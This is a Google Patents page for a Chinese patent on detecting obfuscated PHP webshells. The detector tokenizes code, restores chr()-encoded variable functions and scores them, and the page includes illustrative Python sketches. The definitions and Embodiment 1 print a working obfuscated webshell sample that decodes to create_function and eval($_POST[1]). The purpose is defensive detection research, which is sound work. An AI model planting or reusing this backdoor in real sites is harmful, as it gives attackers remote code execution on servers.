CN107341399A - Method and device for assessing code file security - Google Patents
- Publication number
- CN107341399A (application CN201610282740.8A)
- Authority
- CN
- China
- Prior art keywords
- token
- function
- variable
- code file
- expression
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Classifications
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/562—Static detection
- G06F21/563—Static detection by source code analysis
Abstract
The invention discloses a method and device for assessing code file security. The method includes: parsing variable functions and assignment expressions from a code file to be detected; restoring directly invoked functions and original called functions according to the variable functions and assignment expressions; and assessing the security of the code file using preset safety coefficients corresponding to the directly invoked functions and preset safety coefficients corresponding to the original called functions. The invention solves the technical problem that the security detection schemes for webshell code files provided in the related art have low detection efficiency and low accuracy.
Description
Technical field
The present invention relates to the field of computer software, and in particular to a method and device for assessing code file security.
Background
"Web" means that the server provides web services, and "shell" means obtaining some degree of operating privilege on the server. A webshell is a command execution environment that usually takes the form of a web page file such as asp, php, jsp, or cgi; it is also called a web backdoor. After compromising a website, an attacker typically mixes an asp or php backdoor file in with the normal web page files under the web directory of the website server, and can then access the backdoor with a browser in order to control the website server.
Webshells mostly appear as dynamic scripts and are, in essence, just another page of the website. However, their functionality goes far beyond what an ordinary page is allowed to do: they can perform one or more operations at the system level, operations that normally only a webmaster has permission to carry out. For this reason they are also commonly called website backdoor tools.
Lexical analysis is, in computer science, the process of converting a character string into a sequence of words (Tokens, the smallest elements of a programming language). The lexical analysis phase is the first phase of compilation and the basis for everything that follows. Its task is to read the source program character by character from left to right, that is, to scan the character stream that makes up the source program, and then to identify words (also called word symbols or symbols) according to the word-formation rules. The core tasks of lexical parsing are scanning, identifying words, and giving each identified word a category and a fixed-length representation.
PHP supports the concept of variable functions. This means that if a variable name is followed by parentheses, PHP looks for a function whose name is the value of that variable and attempts to execute it. Variable functions cannot be used with language constructs such as echo(), print(), unset(), isset(), empty(), include(), require() and similar statements; a wrapper function of one's own is needed to use these constructs as variable functions.
In recent years, with the rapid development of Internet technology, attacks by hackers on websites have steadily increased. The "China Internet Network Security Report 2014" issued by the National Internet Emergency Response Center shows that 40186 websites within China had backdoors implanted during 2014, including 1529 government websites. After successfully exploiting a web vulnerability, hackers often upload a webshell to a hidden directory of the website to obtain persistent control over it. Most webshell connections resemble normal website visits: data is transferred through a browser over port 80 using the Hypertext Transfer Protocol (HTTP), so they are highly covert and leave no record in traditional firewalls.
According to statistics from the w3techs website, as of January 24, 2016, PHP accounted for 81.7% of the programming languages used by websites worldwide. Accordingly, the proportion of webshells written in PHP has also increased significantly.
Because a webshell must be interpreted and executed by the corresponding script interpreter, lexical parsing is performed before execution: the code is split into individual words (marks), and each word is assigned a specific role. Such a word is the most basic unit of a programming language, namely a token.
At present, the related art provides a virtual-machine-based dynamic detection technique for PHP webshells. The code file is first parsed lexically and syntactically, which produces intermediate code; the intermediate code obtained in the previous step is then interpreted and executed on a virtual machine. During execution, a built-in function library and an abnormal-behavior rule base are used to analyze the intermediate behavior and thereby judge whether the code is a malicious webshell.
However, this dynamic webshell detection technique relies on dynamic simulated execution in a virtual machine, so detection takes a long time; it neither truly understands the semantics of the code nor supports real-time detection. Moreover, most current webshells require a password and operating parameters. If no parameter or password is specified, virtual-machine dynamic detection cannot determine whether the code is malicious at all, which is an obstacle that current virtual-machine detection techniques find hard to overcome.
In addition, existing static webshell detection techniques usually decide whether a script file is a malicious webshell by signature matching. This approach performs strict string matching between the scripts of a website and the signatures in a signature database; if a signature string is found in a script, the script is judged to be a malicious webshell. Similarly, signatures can be expressed as regular expressions, but the approach still fundamentally depends on signatures. Current static webshell detection techniques therefore have the following defects: the accuracy of identifying malicious webshells is low and the false-positive rate is high; the signature database is large and requires staff to continually collect samples and extract signatures; and, in particular for obfuscated PHP variable functions, relying on a signature database alone is essentially unable to detect malicious webshells.
No effective solution to the above problems has yet been proposed.
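The limitation of literal signature matching described above can be illustrated with a minimal Python sketch. The signature list and both sample scripts are hypothetical and chosen only for illustration; a real signature database would be far larger and is not described in the source.

```python
# Hypothetical signature list (an assumption for illustration only).
SIGNATURES = ["eval(", "create_function", "$_POST"]


def matches_signature(source: str) -> bool:
    """Return True if any literal signature string occurs in the script text."""
    return any(sig in source for sig in SIGNATURES)


# A script that calls a dangerous function by its literal name.
plain = "<?php eval($_POST[1]); ?>"

# A script that assembles function names from character codes through a
# variable function, so no dangerous name appears literally in the text.
obfuscated = (
    "<?php $_uU=chr(99).chr(104).chr(114);"
    "$_e=$_uU(101).$_uU(118).$_uU(97).$_uU(108); ?>"
)

print(matches_signature(plain))       # True
print(matches_signature(obfuscated))  # False
```

The second script never contains any of the signature strings, which is why a purely string-based check passes it.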
Summary of the invention
Embodiments of the present invention provide a method and device for assessing code file security, to at least solve the technical problem that the security detection schemes for webshell code files provided in the related art have low detection efficiency and low accuracy.
According to one aspect of the embodiments of the present invention, a method for assessing code file security is provided, including:
parsing variable functions and assignment expressions from a code file to be detected; restoring directly invoked functions and original called functions according to the variable functions and assignment expressions; and assessing the security of the code file using preset safety coefficients corresponding to the directly invoked functions and preset safety coefficients corresponding to the original called functions.
Optionally, parsing variable functions and assignment expressions from the code file includes: performing lexical analysis on the code file to convert the character strings in the code file into a Token sequence; and parsing the variable functions and assignment expressions from the Token sequence.
Optionally, parsing variable functions from the Token sequence includes: a search step: traversing each Token in the Token sequence in a preset order and searching for a first Token whose category is operator and whose value is a left parenthesis; and a judgment step: when the first Token is found, judging whether the category of the previously traversed Token adjacent to the first Token is variable; if so, searching from the first Token onward for a second Token whose category is operator and whose value is a right parenthesis, and, when the parameter set between the first Token and the second Token matches a preset regular expression, recording the function currently found as a variable function and returning to the search step, until all variable functions have been parsed.
Optionally, parsing assignment expressions from the Token sequence includes: a search step: traversing each Token in the Token sequence in a preset order and searching for a third Token whose category is operator and whose value is an equals sign; and an acquisition step: when the third Token is found, obtaining the previously traversed Token adjacent to the third Token and recording its value as the variable to be assigned in the assignment expression currently found; then searching from the third Token onward for a fourth Token whose category is operator and whose value is a semicolon, obtaining the one or more Tokens between the third Token and the fourth Token, recording them as the expression to be evaluated in the assignment expression currently found, and returning to the search step, until all assignment expressions have been parsed.
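The search and acquisition steps for assignment expressions can be sketched in Python as follows. This is a minimal illustration, not the patented implementation: it assumes each Token is a (category, value) pair, and the function name and the hand-written token list are hypothetical.

```python
def find_assignments(tokens):
    """Collect (target variable, expression tokens) pairs from a token list.

    Each token is assumed to be a (category, value) tuple.
    """
    assignments = []
    i = 0
    while i < len(tokens):
        # Search step: look for an operator token whose value is "=".
        if tokens[i] == ("Operator", "=") and i > 0:
            # Acquisition step: the previous token is the variable to assign.
            target = tokens[i - 1][1]
            # Scan forward to the terminating semicolon.
            j = i + 1
            while j < len(tokens) and tokens[j] != ("Operator", ";"):
                j += 1
            # Everything between "=" and ";" is the expression to evaluate.
            assignments.append((target, tokens[i + 1:j]))
            i = j
        i += 1
    return assignments


# Hand-written tokens for: $_uU=chr(99).chr(104);
tokens = [
    ("Variable", "$_uU"), ("Operator", "="),
    ("Identifier", "chr"), ("Operator", "("), ("Numeral", "99"), ("Operator", ")"),
    ("Operator", "."),
    ("Identifier", "chr"), ("Operator", "("), ("Numeral", "104"), ("Operator", ")"),
    ("Operator", ";"),
]

result = find_assignments(tokens)
print(result[0][0])       # $_uU
print(len(result[0][1]))  # 9
```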
Optionally, restoring directly invoked functions and original called functions according to the variable functions and assignment expressions includes: looking up, in preset transcoding rules, the directly invoked function that matches each variable function; computing the value corresponding to the variable of each assignment expression, and establishing a correspondence between the variable of each assignment expression and its value; and identifying the original called function from the directly invoked functions using the preset transcoding rules and the correspondence.
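One way to picture the restoration step is a small evaluator that keeps a variable-to-value mapping and resolves variable functions through it. The Python sketch below is an assumption-laden illustration: it supports only dot-joined chains of single-number calls, treats ASCII decoding via `chr` as the only transcoding rule, and the names `evaluate` and `restore` are hypothetical.

```python
import re

# Matches one call of the form name(number), where name may start with "$".
CALL_RE = re.compile(r"(\$?\w+)\((\d+)\)")


def evaluate(expr, env):
    """Evaluate a chain such as f(99).f(104), where f is chr or a variable bound to 'chr'."""
    out = []
    for callee, arg in CALL_RE.findall(expr):
        # Resolve a variable function to the function name it is bound to.
        name = env.get(callee, callee)
        if name != "chr":
            raise ValueError(f"unsupported callee: {callee}")
        out.append(chr(int(arg)))
    return "".join(out)


def restore(assignments):
    """Build the variable-to-value correspondence in source order."""
    env = {}
    for var, expr in assignments:
        env[var] = evaluate(expr, env)
    return env


env = restore([
    ("$_uU", "chr(99).chr(104).chr(114)"),
    ("$_fF", "$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101)"
             ".$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116)"
             ".$_uU(105).$_uU(111).$_uU(110)"),
])
print(env["$_uU"])  # chr
print(env["$_fF"])  # create_function
```

Because `$_uU` is resolved to `chr` before `$_fF` is evaluated, the second assignment can be decoded even though it never names `chr` directly.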
Optionally, assessing the security of the code file using the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original called function includes: reading, from a preset storage area, the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original called function; and summing the two safety coefficients to obtain the security assessment result.
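The summation described above can be sketched in a few lines of Python. The coefficient values and the in-memory dictionary standing in for the "preset storage area" are assumptions made for illustration; the source does not give concrete values.

```python
# Hypothetical preset safety coefficients (illustrative values only).
SAFETY_COEFFICIENTS = {"chr": 1, "create_function": 8, "eval": 10}


def assess(direct_functions, original_functions, table=SAFETY_COEFFICIENTS):
    """Sum the coefficients of all restored functions; unknown names count as 0."""
    names = list(direct_functions) + list(original_functions)
    return sum(table.get(name, 0) for name in names)


score = assess(["chr", "create_function"], ["eval"])
print(score)  # 19
```

How the resulting sum is interpreted, for example against a cut-off value, is left open here because the passage above does not specify it.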
According to another aspect of the embodiments of the present invention, another method for assessing code file security is provided, including:
parsing variable functions from a code file to be detected; restoring directly invoked functions according to the variable functions; and assessing the security of the code file using preset safety coefficients corresponding to the directly invoked functions.
According to a further aspect of the embodiments of the present invention, a device for assessing code file security is provided, including:
a parsing module, configured to parse variable functions and assignment expressions from a code file to be detected; a restoration module, configured to restore directly invoked functions and original called functions according to the variable functions and assignment expressions; and an assessment module, configured to assess the security of the code file using preset safety coefficients corresponding to the directly invoked functions and preset safety coefficients corresponding to the original called functions.
Optionally, the parsing module includes: a conversion unit, configured to perform lexical analysis on the code file and convert the character strings in the code file into a Token sequence; and a parsing unit, configured to parse the variable functions and assignment expressions from the Token sequence.
Optionally, the parsing unit includes: a first search subunit, configured to traverse each Token in the Token sequence in a preset order and search for a first Token whose category is operator and whose value is a left parenthesis; a judgment subunit, configured to judge, when the first Token is found, whether the category of the previously traversed Token adjacent to the first Token is variable; and a first parsing subunit, configured to, when the output of the judgment subunit is yes, search from the first Token onward for a second Token whose category is operator and whose value is a right parenthesis, and, when the parameter set between the first Token and the second Token matches a preset regular expression, record the function currently found as a variable function and return to the first search subunit, until all variable functions have been parsed.
Optionally, the parsing unit includes: a second search subunit, configured to traverse each Token in the Token sequence in a preset order and search for a third Token whose category is operator and whose value is an equals sign; an acquisition subunit, configured to obtain, when the third Token is found, the previously traversed Token adjacent to the third Token and record its value as the variable to be assigned in the assignment expression currently found; and a second parsing subunit, configured to search from the third Token onward for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record them as the expression to be evaluated in the assignment expression currently found, and return to the second search subunit, until all assignment expressions have been parsed.
Optionally, the restoration module includes: a first restoration unit, configured to look up, in preset transcoding rules, the directly invoked function that matches each variable function; a processing unit, configured to compute the value corresponding to the variable of each assignment expression and establish a correspondence between the variable of each assignment expression and its value; and a second restoration unit, configured to identify the original called function from the directly invoked functions using the preset transcoding rules and the correspondence.
Optionally, the assessment module includes: a reading unit, configured to read, from a preset storage area, the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original called function; and a computing unit, configured to sum the two safety coefficients to obtain the security assessment result.
According to yet another aspect of the embodiments of the present invention, another device for assessing code file security is provided, including:
a parsing module, configured to parse variable functions from a code file to be detected; a restoration module, configured to restore directly invoked functions according to the variable functions; and an assessment module, configured to assess the security of the code file using preset safety coefficients corresponding to the directly invoked functions.
In the embodiments of the present invention, variable functions and assignment expressions are parsed from the code file to be detected, directly invoked functions and original called functions are restored from them, and the security of the code file is assessed using the preset safety coefficients corresponding to the directly invoked functions and to the original called functions. This improves the detection efficiency for variable-function webshell code files and the accuracy of the detection result, and thereby solves the technical problem that the security detection schemes for webshell code files provided in the related art have low detection efficiency and low accuracy.
Brief description of the drawings
The accompanying drawings described here are provided for further understanding of the invention and form part of this application. The illustrative embodiments of the invention and their description serve to explain the invention and do not unduly limit it. In the drawings:
Fig. 1 is a hardware block diagram of a computer terminal for a method for assessing code file security according to an embodiment of the present invention;
Fig. 2 is a flowchart of a method for assessing code file security according to an embodiment of the present invention;
Fig. 3 is a flowchart of another method for assessing code file security according to an embodiment of the present invention;
Fig. 4 is a structural block diagram of a device for assessing code file security according to an embodiment of the present invention;
Fig. 5 is a structural block diagram of a device for assessing code file security according to a preferred embodiment of the present invention;
Fig. 6 is a structural block diagram of another device for assessing code file security according to an embodiment of the present invention;
Fig. 7 is a structural block diagram of a computer terminal according to an embodiment of the present invention.
Detailed description
To help those skilled in the art better understand the solution of the invention, the technical solutions in the embodiments are described clearly and completely below with reference to the accompanying drawings. The described embodiments are obviously only some, not all, of the embodiments of the invention. All other embodiments obtained by a person of ordinary skill in the art from these embodiments without creative effort fall within the scope of protection of the invention.
It should be noted that the terms "first", "second", and so on in the description, the claims, and the drawings are used to distinguish similar objects and not to describe a particular order or sequence. Data used in this way can be interchanged where appropriate, so that the embodiments described here can be implemented in orders other than those illustrated or described. In addition, the terms "include" and "have" and any variants of them are intended to cover non-exclusive inclusion: for example, a process, method, system, product, or device that contains a series of steps or units is not necessarily limited to the steps or units expressly listed, but may include other steps or units that are not expressly listed or that are inherent to the process, method, product, or device.
The terms used in the present invention are explained as follows:
(1) Variable function: a function concept supported by PHP. If a variable name is followed by parentheses, PHP looks for the function whose name is the value of the variable and attempts to execute it.
(2) Assignment expression: an expression that connects a variable and an expression with an equals sign. The value of the expression on the right of the assignment operator is computed and assigned to the variable on the left, and the value of the left-hand variable becomes the value of the assignment expression.
(3) Directly invoked function: the untranscoded function that is restored by direct invocation, according to preset transcoding rules, from a variable function parsed from the code file.
For example, from "$_uU=chr(99).chr(104).chr(114)" the directly invoked function restored according to the ASCII transcoding rule is: chr.
(4) Original called function: the untranscoded function that is restored by backtracking (iterative) invocation, according to preset transcoding rules, from the variable functions and assignment expressions parsed from the code file.
For example, from "$_uU=chr(99).chr(104).chr(114)" the directly invoked function restored according to the ASCII transcoding rule is: chr;
from "$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110)" the directly invoked function restored according to the ASCII transcoding rule is: create_function;
from "$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59)" the directly invoked function restored according to the ASCII transcoding rule is: eval($_POST[1]);
the original called function finally obtained for $_=$_fF("",$_cC) is: create_function("",eval($_POST[1])).
(5) Transcoding rule: a pre-established implementation standard for converting code from one form into another.
(6) Safety coefficient: the security level of a commonly used function, or the danger level of a dangerous function, obtained from long-term statistical analysis.
(7) Assessment: judging whether the code file is a webshell file maliciously uploaded by an intruder (or attacker).
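The ASCII decoding used in the examples of items (3) and (4) can be checked with a short Python sketch. The helper name `decode_chr_chain` is hypothetical; it simply reads every parenthesised number in a chain as an ASCII code, which is an assumption about the "ASCII transcoding rule" rather than a description of the actual rule set.

```python
import re


def decode_chr_chain(expr: str) -> str:
    """Decode a chain like f(99).f(104) by reading each numeric argument as an ASCII code."""
    codes = re.findall(r"\(\s*(\d+)\s*\)", expr)
    return "".join(chr(int(code)) for code in codes)


print(decode_chr_chain("chr(99).chr(104).chr(114)"))  # chr

fF = ("$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95)"
      ".$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110)")
print(decode_chr_chain(fF))  # create_function

cC = ("$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80)"
      ".$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59)")
print(decode_chr_chain(cC))  # eval($_POST[1]);
```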
Embodiment 1
According to an embodiment of the present invention, a method embodiment for assessing code file security is provided. It should be noted that the steps shown in the flowcharts of the drawings can be executed in a computer system, such as one running a set of computer-executable instructions, and that although a logical order is shown in the flowcharts, in some cases the steps shown or described can be executed in a different order.
The method embodiment provided in Embodiment 1 of this application can be executed in a mobile terminal, a computer terminal, or a similar computing device. Taking execution on a computer terminal as an example, Fig. 1 is a hardware block diagram of a computer terminal for a method for assessing code file security according to an embodiment of the present invention. As shown in Fig. 1, the computer terminal 10 may include one or more processors 102 (only one is shown in the figure; the processor 102 may include, but is not limited to, a processing device such as a microprocessor (MCU) or a programmable logic device (FPGA)), a memory 104 for storing data, and a transmission device 106 for communication functions. A person of ordinary skill in the art will understand that the structure shown in Fig. 1 is only illustrative and does not limit the structure of the above electronic device. For example, the computer terminal 10 may include more or fewer components than shown in Fig. 1, or have a configuration different from that shown in Fig. 1.
The memory 104 can be used to store software programs and modules of application software, such as the program instructions/modules corresponding to the method for assessing code file security in the embodiments of the present invention. By running the software programs and modules stored in the memory 104, the processor 102 performs various functional applications and data processing, that is, implements the above method for assessing code file security. The memory 104 may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid-state memory. In some examples, the memory 104 may further include memory located remotely from the processor 102, and such remote memory can be connected to the computer terminal 10 through a network. Examples of such networks include, but are not limited to, the Internet, an intranet, a local area network, a mobile communication network, and combinations of these.
The transmission device 106 is used to receive or send data via a network. A specific example of such a network is a wireless network provided by the communication provider of the computer terminal 10. In one example, the transmission device 106 includes a network adapter (Network Interface Controller, NIC), which can connect to other network devices through a base station and thereby communicate with the Internet. In another example, the transmission device 106 can be a radio frequency (RF) module, which is used to communicate with the Internet wirelessly.
In the above operating environment, this application provides the method for assessing code file security shown in Fig. 2. Fig. 2 is a flowchart of a method for assessing code file security according to an embodiment of the present invention. As shown in Fig. 2, the method can include the following processing steps:
Step S22: parse variable functions and assignment expressions from the code file to be detected;
Step S24: restore directly invoked functions and original called functions according to the variable functions and assignment expressions;
Step S26: assess the security of the code file using preset safety coefficients corresponding to the directly invoked functions and preset safety coefficients corresponding to the original called functions.
The technical solution provided by the embodiments of the present invention can be applied to static webshell detection for PHP scripts. The code file written in PHP is parsed (including lexical analysis and semantic analysis); variable functions assembled by string concatenation are restored; and, using the restored directly invoked functions and the assignment expressions in the code file, the code is traced back until the original called functions are restored, in order to judge whether the code file contains functions commonly used by webshells or dangerous functions. The security of the code file is then assessed using the preset safety coefficients corresponding to the directly invoked functions (for example, the danger level of a commonly used or dangerous function) and the preset safety coefficients corresponding to the original called functions, to judge whether the code file is a webshell file maliciously uploaded by an intruder (or attacker).
It should be noted that the above process of assessing the security of the code file can be implemented in Lua. Lua has a small footprint, runs fast, uses little memory, offers good compatibility, and allows rapid development, and Lua and C/C++ can call each other conveniently. It is therefore easy to integrate the technical solution provided by the embodiments of the present invention.
Optionally, in step S22, parsing variable functions and assignment expressions from the code file can include the following steps:
Step S221: perform lexical analysis on the code file and convert the character strings in the code file into a Token sequence;
Step S222: parse the variable functions and assignment expressions from the Token sequence.
The lexical analyzer can draw on Lua's lexer lexical parsing library and the lexical analysis of PHP's zend module to extract identifiers, comments, numbers, PHP keywords, variables, operators, and special characters from the source program in the code file by regular-expression matching, and then extract all Tokens from the original code file in order of appearance to form a Tokens array. The word symbols output by the lexical analyzer can generally be expressed as the following pair:
(word category, word attribute value);
Here, because keywords are identifiers with a fixed meaning defined by the programming language, they generally cannot be used as ordinary identifiers. Identifiers can represent various names, such as variable names, array names, function names, and procedure names. Constant types can include, but are not limited to, integer, real, Boolean, and character. Operator types can include, but are not limited to, +, -, *, /.
Suppose the code segment intercepted from the code file to be detected is as follows:
<?php
$_uU=chr(99).chr(104).chr(114);
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);
$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);
$_=$_fF("",$_cC);
@$_();
?>
Taking the code line "$_uU=chr(99).chr(104).chr(114);" as an example, the result of lexical analysis is shown in Table 1:
Table 1
Category | Attribute value |
Variable | $_uU |
Operator | = |
Identifier | chr |
Operator | ( |
Numeral | 99 |
Operator | ) |
Operator | . |
Identifier | chr |
Operator | ( |
Numeral | 104 |
Operator | ) |
Operator | . |
Identifier | chr |
Operator | ( |
Numeral | 114 |
Operator | ) |
Operator | ; |
In the same way as shown in Table 1, the character strings of the above code segment can be converted into a Token sequence, from which the variable functions and assignment expressions are then parsed.
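The conversion shown in Table 1 can be approximated with a small regular-expression tokenizer. The Python sketch below is only an illustration under stated assumptions: the token patterns are simplified guesses, the category names are taken from Table 1, and the actual analyzer (described as drawing on Lua's lexer library and PHP's zend module) is not reproduced here.

```python
import re

# Simplified token patterns (assumptions); order matters because the
# first alternative that matches at a position wins.
TOKEN_SPEC = [
    ("Variable",   r"\$[A-Za-z_][A-Za-z0-9_]*"),
    ("Numeral",    r"\d+"),
    ("Identifier", r"[A-Za-z_][A-Za-z0-9_]*"),
    ("Operator",   r"[=().;,@\[\]+\-*/]"),
    ("Skip",       r"\s+"),
]
TOKEN_RE = re.compile("|".join(f"(?P<{name}>{pattern})" for name, pattern in TOKEN_SPEC))


def tokenize(source):
    """Return a list of (category, value) pairs in source order, dropping whitespace."""
    tokens = []
    for match in TOKEN_RE.finditer(source):
        if match.lastgroup != "Skip":
            tokens.append((match.lastgroup, match.group()))
    return tokens


tokens = tokenize("$_uU=chr(99).chr(104).chr(114);")
for category, value in tokens:
    print(category, "|", value)
```

For the sample line this yields 17 pairs, beginning with the variable `$_uU` and ending with the operator `;`, matching the rows of Table 1.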
Optionally, in step S222, parsing variable functions from the Token sequence can include the following steps:
Step S2221: traverse each Token in the Token sequence in a preset order and search for a first Token whose category is operator and whose value is a left parenthesis;
Step S2222: when the first Token is found, judge whether the category of the previously traversed Token adjacent to the first Token is variable;
Step S2223: if so, search from the first Token onward for a second Token whose category is operator and whose value is a right parenthesis, and, when the parameter set between the first Token and the second Token matches a preset regular expression, record the function currently found as a variable function and return to step S2221, until all variable functions have been parsed.
After the Tokens array is obtained by lexical analysis, each Token in the array can be traversed in a preset order (for example, the order in which the lexical analyzer analyzed the code file). Because a function call requires parentheses (i.e. "()"), the first task is to find a token Tokens[i] whose category is operator and whose value is a left parenthesis (i.e. "("), which corresponds to the first Token above. Next, once such a Tokens[i] has been found, the previously traversed token Tokens[i-1] is examined to determine whether its category is variable. Then, if the category of Tokens[i-1] is variable, the search continues for a token Tokens[i+n] whose category is operator and whose value is a right parenthesis (corresponding to the second Token above, where n is a positive integer). If the parameter set between the first Token and the second Token matches the preset regular expression, the function currently found is recorded as a variable function. The parameter set only needs to satisfy the matching rule of the PHP regular expression. For example, the parameter set may include, but is not limited to, at least one of the following: letters, digits, underscores, special symbols (for example, $), and parameters passed when a user accesses a PHP web page.
Note that if $ appears together with at least one letter, digit, or underscore, the parameter must begin with $, for example $_POST['aaa']. A parameter set in which $ is not at the beginning, such as a$b, does not satisfy the matching rule of the above PHP regular expression.
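Steps S2221 to S2223 can be sketched in Python as follows. The patent does not disclose the preset regular expression, so PARAMS_RE below is an assumed pattern that only encodes the rules stated above (letters, digits, underscores, "$" allowed only at the start, optional array index, string literals). The helper lex is a tiny stand-in lexer, also an assumption.

```python
import re


def lex(src):
    """Tiny stand-in lexer (an assumption, not the patent's analyzer)."""
    pattern = r'(\$\w+)|([A-Za-z_]\w*)|(\d+)|("[^"]*")|(\S)'
    categories = ["Variable", "Identifier", "Numeral", "String", "Operator"]
    return [(categories[m.lastindex - 1], m.group())
            for m in re.finditer(pattern, src)]


# Assumed parameter pattern: comma-separated items, each either a string literal
# or a word that may carry "$" only at the start, optionally followed by [index].
ARG = r'(?:\$?\w+(?:\[[^\]]*\])?|"[^"]*")'
PARAMS_RE = re.compile(rf'{ARG}(?:,{ARG})*')


def find_variable_functions(tokens):
    found = []
    for i, token in enumerate(tokens):
        # S2221: look for an operator token whose value is "(".
        if token != ("Operator", "(") or i == 0:
            continue
        # S2222: the previously traversed token must be a variable.
        prev_category, prev_value = tokens[i - 1]
        if prev_category != "Variable":
            continue
        # S2223: find the next ")" and check the parameters in between.
        j = i + 1
        while j < len(tokens) and tokens[j] != ("Operator", ")"):
            j += 1
        if j == len(tokens):
            continue
        params = "".join(value for _, value in tokens[i + 1:j])
        if PARAMS_RE.fullmatch(params):
            found.append(f"{prev_value}({params})")
    return found


sample = '$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118);$_=$_fF("",$_cC);@$_();'
print(find_variable_functions(lex(sample)))
```

Under this assumed pattern an empty parameter list does not match, so the final call $_() is not recorded, while chr(...) calls are skipped because chr is an identifier rather than a variable.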
In the code segment above, when the first "(" is detected, the Token preceding it is chr, whose category is identifier rather than variable, so chr(99) is not a variable function. The same holds for the second and third "(": the preceding Token is again the identifier chr, so chr(104) and chr(114) are not variable functions either. When the fourth "(" is detected, the Token preceding it is $_uU, whose category is variable, so it is necessary to check whether the 101 between this "(" and the first ")" after it satisfies the matching rule of the above PHP regular expression. The number 101 does satisfy the rule, so $_uU(101) is a variable function being sought, where $_uU is the variable function name and 101 is the parameter of the variable function.
By the same reasoning, the variable functions in the code segment above also include: $_uU(118), $_uU(97), $_uU(108), $_uU(40), $_uU(36), $_uU(95), $_uU(80), $_uU(79), $_uU(83), $_uU(84), $_uU(91), $_uU(49), $_uU(93), $_uU(41), $_uU(59), $_uU(99), $_uU(114), $_uU(101), $_uU(97), $_uU(116), $_uU(101), $_uU(95), $_uU(102), $_uU(117), $_uU(110), $_uU(99), $_uU(116), $_uU(105), $_uU(111), $_uU(110), and $_fF("",$_cC).
Optionally, in step S222, parsing the assignment expressions from the Token sequence may include the following steps:
Step S2224: Traverse each Token in the Token sequence in a preset order, looking for a third Token whose category is operator and whose value is an equal sign;
Step S2225: When the third Token is found, obtain the previously traversed Token adjacent to the third Token, and record the value of that Token as the variable to be assigned in the assignment expression currently found;
Step S2226: Search onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, and record them as the expression to be evaluated in the assignment expression currently found. Return to step S2224 until all assignment expressions have been parsed.
After the Tokens array is obtained by lexical analysis, the difference from parsing variable functions is that an assignment expression is expressed mainly through the equal sign (=). Each Token in the Tokens array can therefore be traversed in a preset order (for example, the order in which the lexical analyzer analyzed the code file). Because an assignment expression requires an equal sign (i.e. "="), the first task is to find a token Tokens[i] whose category is operator and whose value is an equal sign, which corresponds to the third Token above. Next, the previously traversed token Tokens[i-1] is obtained, and its value is recorded as the variable to be assigned in the assignment expression currently found. Then the search continues for a token Tokens[i+n] whose category is operator and whose value is a semicolon (corresponding to the fourth Token above, where n is a positive integer), and the one or more Tokens between Tokens[i] and Tokens[i+n] are recorded as the expression to be evaluated in the assignment expression currently found.
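Steps S2224 to S2226 can be sketched in Python as follows. The token list is written out by hand from Table 1; the function names find_assignments and chr_call are hypothetical and exist only for this illustration.

```python
def find_assignments(tokens):
    """Return (variable, expression) pairs found in a (category, value) token list."""
    assignments = []
    i = 0
    while i < len(tokens):
        # S2224: look for an operator token whose value is "=".
        if tokens[i] == ("Operator", "=") and i > 0:
            # S2225: the previously traversed token names the variable to be assigned.
            variable = tokens[i - 1][1]
            # S2226: collect everything up to the next ";" as the expression.
            j = i + 1
            while j < len(tokens) and tokens[j] != ("Operator", ";"):
                j += 1
            expression = "".join(value for _, value in tokens[i + 1:j])
            assignments.append((variable, expression))
            i = j  # resume scanning after this statement
        i += 1
    return assignments


def chr_call(code):
    """Tokens for chr(<code>), mirroring the rows of Table 1."""
    return [("Identifier", "chr"), ("Operator", "("),
            ("Numeral", str(code)), ("Operator", ")")]


dot = [("Operator", ".")]
table1_tokens = ([("Variable", "$_uU"), ("Operator", "=")]
                 + chr_call(99) + dot + chr_call(104) + dot + chr_call(114)
                 + [("Operator", ";")])

print(find_assignments(table1_tokens))
```

This sketch treats every "=" operator as an assignment, which suffices for the sample; a real analyzer would also have to distinguish comparison operators such as "==".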
